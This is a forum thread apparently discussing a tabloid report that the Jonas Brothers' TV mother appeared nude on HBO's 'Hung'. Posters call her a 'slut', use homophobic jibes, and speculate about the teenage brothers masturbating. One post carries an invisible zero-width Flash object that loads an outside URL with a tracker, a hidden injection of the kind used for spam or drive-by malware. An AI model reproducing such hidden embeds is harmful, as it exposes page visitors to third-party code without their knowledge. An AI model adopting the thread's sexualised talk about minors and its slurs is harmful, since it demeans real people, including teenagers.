Jonas Brothers traumatized by mom's full frontal nudity? (1 Viewer)

Reaction score
They are a government project. Look at those three and tell me their weren't manufactured somewhere.

64494.jpg

MAMA MIA! Turns out nobody gave teen sensations the JONAS BROTHERS a "flash alert" when they tuned in to watch actress REBECCA CRESKOFF - their oh-so-yummy mummy on the Disney Channel's "Jonas" - moonlighting on "Hung," HBO's steamy new ratings-grabber about a mightily endowed high school basketball coach who's made the stunning discovery that his one really BIG asset is mighty marketable to women!

KEVIN, JOE and NICK knew "Hung" was sexually edgy, but the guys literally gasped and turned red when redhead Rebecca - about to sample the ample services of Rent-a-Coach as he made his final...er, drive for the basket, so to speak - lifted her skirt, faced the camera full frontal, sans undies...and shockingly revealed to My Three Sons that the carpet matches the drapes!...YIKES!!...

I know this is the Enquirer but they are spot on about the mom going full frontal.

jonas_bros.jpg

Obviously, I can't post pics of the scene as her "Jonas chute" pretty much smacks you in the face, but that's her above.............the redheaded slut.
party0049.gif

I really hope they were in mid-ummm, self-erotica at the moment she popped nude.

Sounds just like what those boys needed.

I would never be confused with a fashion guru, but those dudes dress horribly. At least pop the collars.

Ok, I'll say it TTIU.......nevermind....

They need a nice fire crotch to knock some sense into them. They have one of the greatest access to tail ever presented to teenage boys and they are blowing it. They should take advantage, because they aren't like Tebow. They are donut holes, people will start to wonder if they are gay really soon, if not already.

I really hope they were in mid-ummm, self-erotica at the moment she popped nude.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I actually watch that show. Not that impressive nude. Ok but nothing special...

Wait, so how does this square with the wholesome purity ring-wearers? Is Mom the black sheep of the family?

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom